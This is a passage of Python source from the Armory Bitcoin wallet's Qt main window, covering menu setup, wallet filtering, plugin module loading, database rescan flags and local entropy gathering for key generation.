self.connect(self.comboWltSelect, SIGNAL('activated(int)'),
self.changeWltFilter)
self.lblTot = QRichLabel(self.tr('<b>Maximum Funds:</b>'), doWrap=False);
self.lblSpd = QRichLabel(self.tr('<b>Spendable Funds:</b>'), doWrap=False);
self.lblUcn = QRichLabel(self.tr('<b>Unconfirmed:</b>'), doWrap=False);
self.lblTotalFunds = QRichLabel('-'*12, doWrap=False)
self.lblSpendFunds = QRichLabel('-'*12, doWrap=False)
self.lblUnconfFunds = QRichLabel('-'*12, doWrap=False)
self.lblTotalFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblSpendFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblUnconfFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblTot.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblSpd.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblUcn.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblBTC1 = QRichLabel('<b>BTC</b>', doWrap=False)
self.lblBTC2 = QRichLabel('<b>BTC</b>', doWrap=False)
self.lblBTC3 = QRichLabel('<b>BTC</b>', doWrap=False)
self.ttipTot = self.createToolTipWidget( self.tr(
'Funds if all current transactions are confirmed. '
'Value appears gray when it is the same as your spendable funds.'))
self.ttipSpd = self.createToolTipWidget( self.tr('Funds that can be spent <i>right now</i>'))
self.ttipUcn = self.createToolTipWidget( self.tr(
'Funds that have less than 6 confirmations, and thus should not '
'be considered <i>yours</i>, yet.'))
self.frmTotals = QFrame()
self.frmTotals.setFrameStyle(STYLE_NONE)
frmTotalsLayout = QGridLayout()
frmTotalsLayout.addWidget(self.lblTot, 0,0)
frmTotalsLayout.addWidget(self.lblSpd, 1,0)
frmTotalsLayout.addWidget(self.lblUcn, 2,0)
frmTotalsLayout.addWidget(self.lblTotalFunds, 0,1)
frmTotalsLayout.addWidget(self.lblSpendFunds, 1,1)
frmTotalsLayout.addWidget(self.lblUnconfFunds, 2,1)
frmTotalsLayout.addWidget(self.lblBTC1, 0,2)
frmTotalsLayout.addWidget(self.lblBTC2, 1,2)
frmTotalsLayout.addWidget(self.lblBTC3, 2,2)
frmTotalsLayout.addWidget(self.ttipTot, 0,3)
frmTotalsLayout.addWidget(self.ttipSpd, 1,3)
frmTotalsLayout.addWidget(self.ttipUcn, 2,3)
self.frmTotals.setLayout(frmTotalsLayout)
# Add the available tabs to the main tab widget
self.MAINTABS = enum('Dash','Ledger')
self.mainDisplayTabs.addTab(self.tabDashboard, self.tr('Dashboard'))
##########################################################################
if not CLI_OPTIONS.disableModules:
if USE_TESTNET or USE_REGTEST:
self.loadArmoryModulesNoZip()
# Armory modules are disabled on mainnet. If enabled, they are loaded from
# zip files that contain the module code.
# else:
# self.loadArmoryModules()
##########################################################################
self.lbDialog = None
btnSendBtc = QPushButton(self.tr("Send Bitcoins"))
btnRecvBtc = QPushButton(self.tr("Receive Bitcoins"))
btnWltProps = QPushButton(self.tr("Wallet Properties"))
btnOfflineTx = QPushButton(self.tr("Offline Transactions"))
btnMultisig = QPushButton(self.tr("Lockboxes (Multi-Sig)"))
self.connect(btnWltProps, SIGNAL('clicked()'), self.execDlgWalletDetails)
self.connect(btnRecvBtc, SIGNAL('clicked()'), self.clickReceiveCoins)
self.connect(btnSendBtc, SIGNAL('clicked()'), self.clickSendBitcoins)
self.connect(btnOfflineTx,SIGNAL('clicked()'), self.execOfflineTx)
self.connect(btnMultisig, SIGNAL('clicked()'), self.browseLockboxes)
verStr = 'Armory %s / %s' % (getVersionString(BTCARMORY_VERSION),
UserModeStr(self, self.usermode))
lblInfo = QRichLabel(verStr, doWrap=False)
lblInfo.setFont(GETFONT('var',10))
lblInfo.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
logoBtnFrame = []
logoBtnFrame.append(self.lblLogoIcon)
logoBtnFrame.append(btnSendBtc)
logoBtnFrame.append(btnRecvBtc)
logoBtnFrame.append(btnWltProps)
if self.usermode in (USERMODE.Advanced, USERMODE.Expert):
logoBtnFrame.append(btnOfflineTx)
if self.usermode in (USERMODE.Expert,):
logoBtnFrame.append(btnMultisig)
logoBtnFrame.append(lblInfo)
logoBtnFrame.append('Stretch')
btnFrame = makeVertFrame(logoBtnFrame, STYLE_SUNKEN)
logoWidth=220
btnFrame.sizeHint = lambda: QSize(logoWidth*1.0, 10)
btnFrame.setMaximumWidth(logoWidth*1.2)
btnFrame.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Expanding)
layout = QGridLayout()
layout.addWidget(btnFrame, 0, 0, 1, 1)
layout.addWidget(wltFrame, 0, 1, 1, 1)
layout.addWidget(self.mainDisplayTabs, 1, 0, 1, 2)
layout.setRowStretch(0, 1)
layout.setRowStretch(1, 5)
# Attach the layout to the frame that will become the central widget
mainFrame = QFrame()
mainFrame.setLayout(layout)
self.setCentralWidget(mainFrame)
self.setMinimumSize(750,500)
# Start the user at the dashboard
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
##########################################################################
# Set up menu and actions
#MENUS = enum('File', 'Wallet', 'User', "Tools", "Network")
currmode = self.getSettingOrSetDefault('User_Mode', 'Advanced')
MENUS = enum('File', 'User', 'Tools', 'Addresses', 'Wallets', \
'MultiSig', 'Help')
self.menu = self.menuBar()
self.menusList = []
self.menusList.append( self.menu.addMenu(self.tr('&File')) )
self.menusList.append( self.menu.addMenu(self.tr('&User')) )
self.menusList.append( self.menu.addMenu(self.tr('&Tools')) )
self.menusList.append( self.menu.addMenu(self.tr('&Addresses')) )
self.menusList.append( self.menu.addMenu(self.tr('&Wallets')) )
self.menusList.append( self.menu.addMenu(self.tr('&MultiSig')) )
self.menusList.append( self.menu.addMenu(self.tr('&Help')) )
#self.menusList.append( self.menu.addMenu('&Network') )
def exportTx():
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
QMessageBox.warning(self, self.tr('Transactions Unavailable'),
self.tr('Transaction history cannot be collected until Armory is '
'in online mode. Please try again when Armory is online. '),
QMessageBox.Ok)
return
else:
DlgExportTxHistory(self,self).exec_()
actExportTx = self.createAction(self.tr('&Export Transactions...'), exportTx)
actSettings = self.createAction(self.tr('&Settings...'), self.openSettings)
actMinimApp = self.createAction(self.tr('&Minimize Armory'), self.minimizeArmory)
actExportLog = self.createAction(self.tr('Export &Log File...'), self.exportLogFile)
actCloseApp = self.createAction(self.tr('&Quit Armory'), self.closeForReal)
self.menusList[MENUS.File].addAction(actExportTx)
self.menusList[MENUS.File].addAction(actSettings)
self.menusList[MENUS.File].addAction(actMinimApp)
self.menusList[MENUS.File].addAction(actExportLog)
self.menusList[MENUS.File].addAction(actCloseApp)
def chngStd(b):
if b: self.setUserMode(USERMODE.Standard)
def chngAdv(b):
if b: self.setUserMode(USERMODE.Advanced)
def chngDev(b):
if b: self.setUserMode(USERMODE.Expert)
modeActGrp = QActionGroup(self)
actSetModeStd = self.createAction(self.tr('&Standard'), chngStd, True)
actSetModeAdv = self.createAction(self.tr('&Advanced'), chngAdv, True)
actSetModeDev = self.createAction(self.tr('&Expert'), chngDev, True)
modeActGrp.addAction(actSetModeStd)
modeActGrp.addAction(actSetModeAdv)
modeActGrp.addAction(actSetModeDev)
self.menusList[MENUS.User].addAction(actSetModeStd)
self.menusList[MENUS.User].addAction(actSetModeAdv)
self.menusList[MENUS.User].addAction(actSetModeDev)
LOGINFO('Usermode: %s', currmode)
self.firstModeSwitch=True
if currmode=='Standard':
self.usermode = USERMODE.Standard
actSetModeStd.setChecked(True)
elif currmode=='Advanced':
self.usermode = USERMODE.Advanced
actSetModeAdv.setChecked(True)
elif currmode=='Expert':
self.usermode = USERMODE.Expert
actSetModeDev.setChecked(True)
def openMsgSigning():
MessageSigningVerificationDialog(self,self).exec_()
def openBlindBroad():
if not TheSDM.satoshiIsAvailable():
QMessageBox.warning(self, self.tr("Not Online"), self.tr(
'Bitcoin Core is not available, so Armory will not be able '
'to broadcast any transactions for you.'), QMessageBox.Ok)
return
DlgBroadcastBlindTx(self,self).exec_()
actOpenSigner = self.createAction(self.tr('&Message Signing/Verification...'), openMsgSigning)
if currmode=='Expert':
actOpenTools = self.createAction(self.tr('&EC Calculator...'), lambda: DlgECDSACalc(self,self, 1).exec_())
actBlindBroad = self.createAction(self.tr('&Broadcast Raw Transaction...'), openBlindBroad)
self.menusList[MENUS.Tools].addAction(actOpenSigner)
if currmode=='Expert':
self.menusList[MENUS.Tools].addAction(actOpenTools)
self.menusList[MENUS.Tools].addAction(actBlindBroad)
def mkprom():
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
QMessageBox.warning(self, self.tr('Offline'), self.tr(
'Armory is currently offline, and cannot determine what funds are '
'available for Simulfunding. Please try again when Armory is in '
'online mode.'), QMessageBox.Ok)
else:
DlgCreatePromNote(self, self).exec_()
def msrevsign():
title = self.tr('Import Multi-Spend Transaction')
descr = self.tr(
'Import a signature-collector text block for review and signing. '
'It is usually a block of text with "TXSIGCOLLECT" in the first line, '
'or a <i>*.sigcollect.tx</i> file.')
ftypes = ['Signature Collectors (*.sigcollect.tx)']
dlgImport = DlgImportAsciiBlock(self, self, title, descr, ftypes,
UnsignedTransaction)
dlgImport.exec_()
if dlgImport.returnObj:
DlgMultiSpendReview(self, self, dlgImport.returnObj).exec_()
simulMerge = lambda: DlgMergePromNotes(self, self).exec_()
actMakeProm = self.createAction(self.tr('Simulfund &Promissory Note'), mkprom)
actPromCollect = self.createAction(self.tr('Simulfund &Collect && Merge'), simulMerge)
actMultiSpend = self.createAction(self.tr('Simulfund &Review && Sign'), msrevsign)
if not self.usermode==USERMODE.Expert:
self.menusList[MENUS.MultiSig].menuAction().setVisible(False)
# Addresses
actAddrBook = self.createAction(self.tr('View &Address Book...'), self.execAddressBook)
actSweepKey = self.createAction(self.tr('&Sweep Private Key/Address...'), self.menuSelectSweepKey)
actImportKey = self.createAction(self.tr('&Import Private Key/Address...'), self.menuSelectImportKey)
self.menusList[MENUS.Addresses].addAction(actAddrBook)
if not currmode=='Standard':
self.menusList[MENUS.Addresses].addAction(actImportKey)
self.menusList[MENUS.Addresses].addAction(actSweepKey)
actCreateNew = self.createAction(self.tr('&Create New Wallet'), self.startWalletWizard)
actImportWlt = self.createAction(self.tr('&Import or Restore Wallet'), self.execImportWallet)
actAddressBook = self.createAction(self.tr('View &Address Book'), self.execAddressBook)
actRecoverWlt = self.createAction(self.tr('&Fix Damaged Wallet'), self.RecoverWallet)
self.menusList[MENUS.Wallets].addAction(actCreateNew)
self.menusList[MENUS.Wallets].addAction(actImportWlt)
self.menusList[MENUS.Wallets].addSeparator()
self.menusList[MENUS.Wallets].addAction(actRecoverWlt)
execAbout = lambda: DlgHelpAbout(self).exec_()
actAboutWindow = self.createAction(self.tr('&About Armory...'), execAbout)
actClearMemPool = self.createAction(self.tr('Clear All Unconfirmed'), self.clearMemoryPool)
actRescanDB = self.createAction(self.tr('Rescan Databases'), self.rescanNextLoad)
actRebuildDB = self.createAction(self.tr('Rebuild and Rescan Databases'), self.rebuildNextLoad)
actRescanBalance = self.createAction(self.tr('Rescan Balance'), self.rescanBalanceNextLoad)
actFactoryReset = self.createAction(self.tr('Factory Reset'), self.factoryReset)
self.menusList[MENUS.Help].addAction(actAboutWindow)
self.menusList[MENUS.Help].addSeparator()
self.menusList[MENUS.Help].addSeparator()
self.menusList[MENUS.Help].addAction(actClearMemPool)
self.menusList[MENUS.Help].addAction(actRescanBalance)
self.menusList[MENUS.Help].addAction(actRescanDB)
self.menusList[MENUS.Help].addAction(actRebuildDB)
self.menusList[MENUS.Help].addAction(actFactoryReset)
execMSHack = lambda: DlgSelectMultiSigOption(self,self).exec_()
execBrowse = lambda: DlgLockboxManager(self,self).exec_()
actMultiHacker = self.createAction(self.tr('Multi-Sig Lockboxes'), execMSHack)
actBrowseLockboxes = self.createAction(self.tr('Lockbox &Manager...'), execBrowse)
#self.menusList[MENUS.MultiSig].addAction(actMultiHacker)
self.menusList[MENUS.MultiSig].addAction(actBrowseLockboxes)
self.menusList[MENUS.MultiSig].addAction(actMakeProm)
self.menusList[MENUS.MultiSig].addAction(actPromCollect)
self.menusList[MENUS.MultiSig].addAction(actMultiSpend)
self.startBlockchainProcessingInitialization()
# Restore any main-window geometry saved in the settings file
hexgeom = self.settings.get('MainGeometry')
hexwltsz = self.settings.get('MainWalletCols')
if len(hexgeom)>0:
geom = QByteArray.fromHex(hexgeom)
self.restoreGeometry(geom)
if len(hexwltsz)>0:
restoreTableView(self.walletsView, hexwltsz)
if DO_WALLET_CHECK:
self.checkWallets()
self.blkReceived = RightNow()
self.setDashboardDetails()
self.execIntroDialog()
#reactor.callLater(1, self.Heartbeat)
if self.getSettingOrSetDefault('MinimizeOnOpen', False) and not CLI_ARGS:
LOGINFO('MinimizeOnOpen is True')
self.minimizeArmory()
if CLI_ARGS:
self.signalExecution.callLater(1, self.uriLinkClicked, CLI_ARGS[0])
if OS_MACOSX:
self.macNotifHdlr = ArmoryMac.MacNotificationHandler()
# Now that construction of the UI is done
# Check for warnings to be displayed
# This is true if and only if the command line has a data dir that doesn't exist
# and can't be created.
if not CLI_OPTIONS.datadir in [ARMORY_HOME_DIR, DEFAULT]:
QMessageBox.warning(self, self.tr('Default Data Directory'), self.tr(
'Armory is using the default data directory because '
'the data directory specified in the command line could '
'not be found nor created.'), QMessageBox.Ok)
# This is true if and only if the command line has a database dir that doesn't exist
# and can't be created.
elif not CLI_OPTIONS.armoryDBDir in [ARMORY_DB_DIR, DEFAULT]:
QMessageBox.warning(self, self.tr('Default Database Directory'), self.tr(
'Armory is using the default database directory because '
'the database directory specified in the command line could '
'not be found nor created.'), QMessageBox.Ok)
# This is true if and only if the command line has a bitcoin dir that doesn't exist
#if not CLI_OPTIONS.satoshiHome in [BTC_HOME_DIR, DEFAULT]:
# QMessageBox.warning(self, self.tr('Bitcoin Directory'), self.tr(
# 'Armory is using the default Bitcoin directory because '
# 'the Bitcoin directory specified in the command line could '
# 'not be found.'), QMessageBox.Ok)
if not self.getSettingOrSetDefault('DNAA_DeleteLevelDB', False) and \
os.path.exists(os.path.join(ARMORY_DB_DIR, LEVELDB_BLKDATA)):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Delete Old DB Directory'),
self.tr('Armory detected an older version database. '
'Do you want to delete the old database? Choose yes if you '
'do not think that you will revert to an older version of Armory.'), self.tr('Do not ask this question again'))
if reply[0]==True:
shutil.rmtree(os.path.join(ARMORY_DB_DIR, LEVELDB_BLKDATA))
shutil.rmtree(os.path.join(ARMORY_DB_DIR, LEVELDB_HEADERS))
if reply[1]==True:
self.writeSetting('DNAA_DeleteLevelDB', True)
self.signalExecution.callLater(1, self.walletTimeoutCheck)
####################################################
def getWatchingOnlyWallets(self):
result = []
for wltID in self.walletIDList:
if self.walletMap[wltID].watchingOnly:
result.append(wltID)
return result
####################################################
def changeWltFilter(self):
if self.netMode == NETWORKMODE.Offline:
return
currIdx = max(self.comboWltSelect.currentIndex(), 0)
currText = unicode(self.comboWltSelect.currentText()).lower()
if currText.lower().startswith('custom filter'):
self.walletsView.showColumn(0)
#self.walletsView.resizeColumnToContents(0)
else:
self.walletsView.hideColumn(0)
if currIdx != 4:
for i in range(0, len(self.walletVisibleList)):
self.walletVisibleList[i] = False
# If a specific wallet is selected, just set that and you're done
if currIdx > 4:
self.walletVisibleList[currIdx-7] = True
self.setWltSetting(self.walletIDList[currIdx-7], 'LedgerShow', True)
else:
# Else we walk through the wallets and flag the particular ones
typelist = [[wid, determineWalletType(self.walletMap[wid], self)[0]] \
for wid in self.walletIDList]
for i,winfo in enumerate(typelist):
wid,wtype = winfo[:]
if currIdx==0:
# My wallets
doShow = wtype in [WLTTYPES.Offline,WLTTYPES.Crypt,WLTTYPES.Plain]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==1:
# Offline wallets
doShow = winfo[1] in [WLTTYPES.Offline]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==2:
# Others' Wallets
doShow = winfo[1] in [WLTTYPES.WatchOnly]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==3:
# All Wallets
self.walletVisibleList[i] = True
self.setWltSetting(wid, 'LedgerShow', True)
self.mainLedgerCurrentPage = 1
self.PageLineEdit.setText(unicode(self.mainLedgerCurrentPage))
self.wltIDList = []
for i,vis in enumerate(self.walletVisibleList):
if vis:
wltid = self.walletIDList[i]
if self.walletMap[wltid].isEnabled:
self.wltIDList.append(wltid)
TheBDM.bdv().updateWalletsLedgerFilter(self.wltIDList)
############################################################################
def loadArmoryModulesNoZip(self):
"""
This method checks for any .py files in the exec directory
"""
moduleDir = os.path.join(GetExecDir(), MODULES_ZIP_DIR_NAME)
if not moduleDir or not os.path.exists(moduleDir):
return
LOGWARN('Attempting to load modules from: %s' % MODULES_ZIP_DIR_NAME)
# This call does not eval any code in the modules. It simply
# loads the python files as raw chunks of text so we can
# check hashes and signatures
modMap = getModuleListNoZip(moduleDir)
for moduleName,infoMap in modMap.iteritems():
module = dynamicImportNoZip(moduleDir, moduleName, globals())
plugObj = module.PluginObject(self)
if not hasattr(plugObj,'getTabToDisplay') or \
not hasattr(plugObj,'tabName'):
LOGERROR('Module is malformed! No tabToDisplay or tabName attrs')
QMessageBox.critical(self, self.tr("Bad Module"), self.tr(
'The module you attempted to load (%1) is malformed. It is '
'missing attributes that are needed for Armory to load it. '
'It will be skipped.').arg(moduleName), QMessageBox.Ok)
continue
verPluginInt = getVersionInt(readVersionString(plugObj.maxVersion))
verArmoryInt = getVersionInt(BTCARMORY_VERSION)
if verArmoryInt > verPluginInt:
reply = QMessageBox.warning(self, self.tr("Outdated Module"), self.tr(
'Module "%1" is only specified to work up to Armory version %2. '
'You are using Armory version %3. Please remove the module if '
'you experience any problems with it, or contact the maintainer '
'for a new version. '
'<br><br> '
'Do you want to continue loading the module?').arg(moduleName, plugObj.maxVersion, getVersionString(BTCARMORY_VERSION)),
QMessageBox.Yes | QMessageBox.No)
if not reply==QMessageBox.Yes:
continue
# All plugins should have "getTabToDisplay" and "tabName" attributes
LOGWARN('Adding module to tab list: "' + plugObj.tabName + '"')
self.mainDisplayTabs.addTab(plugObj.getTabToDisplay(), plugObj.tabName)
# Also inject any extra hook methods the plugin provides (see list below)
injectFuncList = [ \
['injectHeartbeatAlwaysFunc', 'extraHeartbeatAlways'],
['injectHeartbeatOnlineFunc', 'extraHeartbeatOnline'],
['injectGoOnlineFunc', 'extraGoOnlineFunctions'],
['injectNewTxFunc', 'extraNewTxFunctions'],
['injectNewBlockFunc', 'extraNewBlockFunctions'],
['injectShutdownFunc', 'extraShutdownFunctions'] ]
# Append each hook method the plugin defines to the matching ArmoryQt list
for plugFuncName,funcListName in injectFuncList:
if not hasattr(plugObj, plugFuncName):
continue
if not hasattr(self, funcListName):
LOGERROR('Missing an ArmoryQt list variable: %s' % funcListName)
continue
LOGINFO('Found module function: %s' % plugFuncName)
funcList = getattr(self, funcListName)
plugFunc = getattr(plugObj, plugFuncName)
funcList.append(plugFunc)
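# For reference, a minimal module compatible with the loader above would be a
# single .py file defining a PluginObject class. The names checked by this
# method (PluginObject, tabName, maxVersion, getTabToDisplay, the inject*
# hooks) are taken from the code above; everything else in this sketch is
# illustrative only:
#
#   from PyQt4.QtGui import QWidget
#
#   class PluginObject(object):
#      tabName = 'My Plugin'        # illustrative tab label
#      maxVersion = '0.96'          # highest Armory version supported (illustrative)
#
#      def __init__(self, main):
#         self.main = main          # reference to the ArmoryMainWindow
#
#      def getTabToDisplay(self):
#         return QWidget()          # widget added to mainDisplayTabs
#
#      # Optional hooks picked up via injectFuncList:
#      def injectHeartbeatAlwaysFunc(self):
#         pass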
############################################################################
def loadArmoryModules(self):
"""
This method checks for any .zip files in the modules directory
"""
modulesZipDirPath = os.path.join(GetExecDir(), MODULES_ZIP_DIR_NAME)
if modulesZipDirPath and os.path.exists(modulesZipDirPath):
self.tempModulesDirName = tempfile.mkdtemp('modules')
# This call does not eval any code in the modules. It simply
# loads the python files as raw chunks of text so we can
# check hashes and signatures
modMap = getModuleList(modulesZipDirPath)
for moduleName,infoMap in modMap.iteritems():
moduleZipPath = os.path.join(modulesZipDirPath, infoMap[MODULE_PATH_KEY])
if infoMap[MODULE_ZIP_STATUS_KEY] == MODULE_ZIP_STATUS.Invalid:
reply = QMessageBox.warning(self, self.tr("Invalid Module"), self.tr(
'Armory detected the following module which is '
'<font color="%1"><b>invalid</b></font>:'
'<br><br>'
' <b>Module Name:</b> %2<br>'
' <b>Module Path:</b> %3<br>'
'<br><br>'
'Armory will only run a module from a zip file that '
'has the required structure.').arg(htmlColor('TextRed'), moduleName, moduleZipPath), QMessageBox.Ok)
elif not USE_TESTNET and not USE_REGTEST and infoMap[MODULE_ZIP_STATUS_KEY] == MODULE_ZIP_STATUS.Unsigned:
reply = QMessageBox.warning(self, self.tr("UNSIGNED Module"), self.tr(
'Armory detected the following module which '
'<font color="%1"><b>has not been signed by Armory</b></font> and may be dangerous: '
'<br><br>'
' <b>Module Name:</b> %2<br>'
' <b>Module Path:</b> %3<br>'
'<br><br>'
'Armory will not allow you to run this module.').arg(htmlColor('TextRed'), moduleName, moduleZipPath), QMessageBox.Ok)
else:
ZipFile(moduleZipPath).extract(INNER_ZIP_FILENAME, self.tempModulesDirName)
ZipFile(os.path.join(self.tempModulesDirName,INNER_ZIP_FILENAME)).extractall(self.tempModulesDirName)
plugin = importModule(self.tempModulesDirName, moduleName, globals())
plugObj = plugin.PluginObject(self)
if not hasattr(plugObj,'getTabToDisplay') or \
not hasattr(plugObj,'tabName'):
LOGERROR('Module is malformed! No tabToDisplay or tabName attrs')
QMessageBox.critical(self, self.tr("Bad Module"), self.tr(
'The module you attempted to load (%1) is malformed. It is '
'missing attributes that are needed for Armory to load it. '
'It will be skipped.').arg(moduleName), QMessageBox.Ok)
continue
verPluginInt = getVersionInt(readVersionString(plugObj.maxVersion))
verArmoryInt = getVersionInt(BTCARMORY_VERSION)
if verArmoryInt > verPluginInt:
reply = QMessageBox.warning(self, self.tr("Outdated Module"), self.tr(
'Module %1 is only specified to work up to Armory version %2. '
'You are using Armory version %3. Please remove the module if '
'you experience any problems with it, or contact the maintainer '
'for a new version.'
'<br><br>'
'Do you want to continue loading the module?').arg(moduleName, plugObj.maxVersion, getVersionString(BTCARMORY_VERSION)),
QMessageBox.Yes | QMessageBox.No)
if not reply==QMessageBox.Yes:
continue
# All plugins should have "getTabToDisplay" and "tabName" attributes
LOGWARN('Adding module to tab list: "' + plugObj.tabName + '"')
self.mainDisplayTabs.addTab(plugObj.getTabToDisplay(), plugObj.tabName)
# Also inject any extra hook methods the plugin provides (see list below)
injectFuncList = [ \
['injectHeartbeatAlwaysFunc', 'extraHeartbeatAlways'],
['injectHeartbeatOnlineFunc', 'extraHeartbeatOnline'],
['injectGoOnlineFunc', 'extraGoOnlineFunctions'],
['injectNewTxFunc', 'extraNewTxFunctions'],
['injectNewBlockFunc', 'extraNewBlockFunctions'],
['injectShutdownFunc', 'extraShutdownFunctions'] ]
# Append each hook method the plugin defines to the matching ArmoryQt list
for plugFuncName,funcListName in injectFuncList:
if not hasattr(plugObj, plugFuncName):
continue
if not hasattr(self, funcListName):
LOGERROR('Missing an ArmoryQt list variable: %s' % funcListName)
continue
LOGINFO('Found module function: %s' % plugFuncName)
funcList = getattr(self, funcListName)
plugFunc = getattr(plugObj, plugFuncName)
funcList.append(plugFunc)
############################################################################
def factoryReset(self):
"""
reply = QMessageBox.information(self,'Factory Reset', \
'You are about to revert all Armory settings '
'to the state they were in when Armory was first installed. '
'<br><br>'
'If you click "Yes," Armory will exit after settings are '
'reverted. You will have to manually start Armory again.'
'<br><br>'
'Do you want to continue? ', \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.removeSettingsOnClose = True
self.closeForReal()
"""
if DlgFactoryReset(self,self).exec_():
# The dialog already wrote all the flag files, just close now
self.closeForReal()
####################################################
def clearMemoryPool(self):
touchFile( os.path.join(ARMORY_HOME_DIR, 'clearmempool.flag') )
msg = self.tr(
'The next time you restart Armory, all unconfirmed transactions will '
'be cleared allowing you to retry any stuck transactions.')
if not self.doAutoBitcoind:
msg += self.tr(
'<br><br>Make sure you also restart Bitcoin Core '
'(or bitcoind) and let it synchronize again before you restart '
'Armory. Doing so will clear its memory pool as well.')
QMessageBox.information(self, self.tr('Memory Pool'), msg, QMessageBox.Ok)
####################################################
def registerWidgetActivateTime(self, widget):
# This is a bit of a hack, but it's a very isolated method to make
# it easy to link widgets to my entropy accumulator
# I just realized this doesn't do exactly what I originally intended...
# I wanted it to work on arbitrary widgets like QLineEdits, but using
# super is not the answer. What I want is the original class method
# to be called after logging keypress, not its superclass method.
# Nonetheless, it does do what I need it to, as long as you only
# register frames and dialogs, not individual widgets/controls.
mainWindow = self
def newKPE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).keyPressEvent(event)
def newKRE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).keyReleaseEvent(event)
def newMPE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).mousePressEvent(event)
def newMRE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).mouseReleaseEvent(event)
from types import MethodType
widget.keyPressEvent = MethodType(newKPE, widget)
widget.keyReleaseEvent = MethodType(newKRE, widget)
widget.mousePressEvent = MethodType(newMPE, widget)
widget.mouseReleaseEvent = MethodType(newMRE, widget)
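# After this call, any key or mouse press on the registered widget first
# appends a timestamp (and cursor position) to self.entropyAccum via
# logEntropy(), then falls through to the normal Qt event handler.
# Illustrative usage (the dialog name here is hypothetical):
#   self.registerWidgetActivateTime(walletWizardDlg)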
####################################################
def logEntropy(self):
try:
self.entropyAccum.append(RightNow())
self.entropyAccum.append(QCursor.pos().x())
self.entropyAccum.append(QCursor.pos().y())
except:
LOGEXCEPT('Error logging keypress entropy')
####################################################
def getExtraEntropyForKeyGen(self):
# The entropyAccum var has all the timestamps, down to the microsecond,
# of every keypress and mouseclick made during the wallet creation
# wizard. Also logs mouse positions on every press, though it will
# be constant while typing. Either way, even if they change no text
# and use a 5-char password, we will still pick up about 40 events.
# Then we throw in the [name, size, time] triplets of some volatile
# system directories, and the hash of a file in that directory that
# is expected to have timestamps and system-dependent parameters.
# Finally, take a desktop screenshot...
# All three of these sources are likely to have sufficient entropy alone.
source1,self.entropyAccum = self.entropyAccum,[]
if len(source1)==0:
LOGERROR('Error getting extra entropy from mouse & key presses')
source2 = []
try:
if OS_WINDOWS:
tempDir = os.getenv('TEMP')
extraFiles = []
elif OS_LINUX:
tempDir = '/var/log'
extraFiles = ['/var/log/Xorg.0.log']
elif OS_MACOSX:
tempDir = '/var/log'
extraFiles = ['/var/log/system.log']
# A simple listing of the directory files, sizes and times is good
if os.path.exists(tempDir):
for fname in os.listdir(tempDir):
fullpath = os.path.join(tempDir, fname)
sz = os.path.getsize(fullpath)
tm = os.path.getmtime(fullpath)
source2.append([fname, sz, tm])
# Also hash the contents of any extra log files gathered above (e.g. Xorg.0.log on Linux, system.log on macOS)
for f in extraFiles:
if os.path.exists(f):
with open(f,'rb') as infile:
source2.append(hash256(infile.read()))
if len(source2)==0:
LOGWARN('Second source of supplemental entropy will be empty')
except:
LOGEXCEPT('Error getting extra entropy from filesystem')
source3 = ''
try:
pixDesk = QPixmap.grabWindow(QApplication.desktop().winId())
pixRaw = QByteArray()
pixBuf = QBuffer(pixRaw)
pixBuf.open(QIODevice.WriteOnly)
pixDesk.save(pixBuf, 'PNG')
source3 = pixBuf.buffer().toHex()
except:
LOGEXCEPT('Third source of entropy (desktop screenshot) failed')
if len(source3)==0:
LOGWARN('Error getting extra entropy from screenshot')
LOGINFO('Adding %d keypress events to the entropy pool', len(source1)/3)
LOGINFO('Adding %s bytes of filesystem data to the entropy pool',
bytesToHumanSize(len(str(source2))))
LOGINFO('Adding %s bytes from desktop screenshot to the entropy pool',
bytesToHumanSize(len(str(source3))/2))
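# Mix all three sources together and compress them to a single 32-byte
# value with a keyed hash; any one source alone should already be enough.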
allEntropy = ''.join([str(a) for a in [source1, source2, source3]])
return SecureBinaryData(HMAC256('Armory Entropy', allEntropy))
####################################################
def rescanNextLoad(self):
reply = QMessageBox.warning(self, self.tr('Queue Rescan?'), self.tr(
'The next time you restart Armory, it will rescan the blockchain '
'database, and reconstruct your wallet histories from scratch. '
'The rescan will take 10-60 minutes depending on your system. '
'<br><br> '
'Do you wish to force a rescan on the next Armory restart?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rescan.flag') )
####################################################
def rebuildNextLoad(self):
reply = QMessageBox.warning(self, self.tr('Queue Rebuild?'), self.tr(
'The next time you restart Armory, it will rebuild and rescan '
'the entire blockchain database. This operation can take between '
'30 minutes and 4 hours depending on your system speed. '
'<br><br>'
'Do you wish to force a rebuild on the next Armory restart?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rebuild.flag') )
####################################################
def rescanBalanceNextLoad(self):
reply = QMessageBox.warning(self, self.tr('Queue Balance Rescan?'), self.tr(
'The next time you restart Armory, it will rescan the balance of '
'your wallets. This operation typically takes less than a minute. '
'<br><br>'
'Do you wish to force a balance rescan on the next Armory restart?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rescanbalance.flag') )
####################################################
def loadFailedManyTimesFunc(self, nFail):
"""
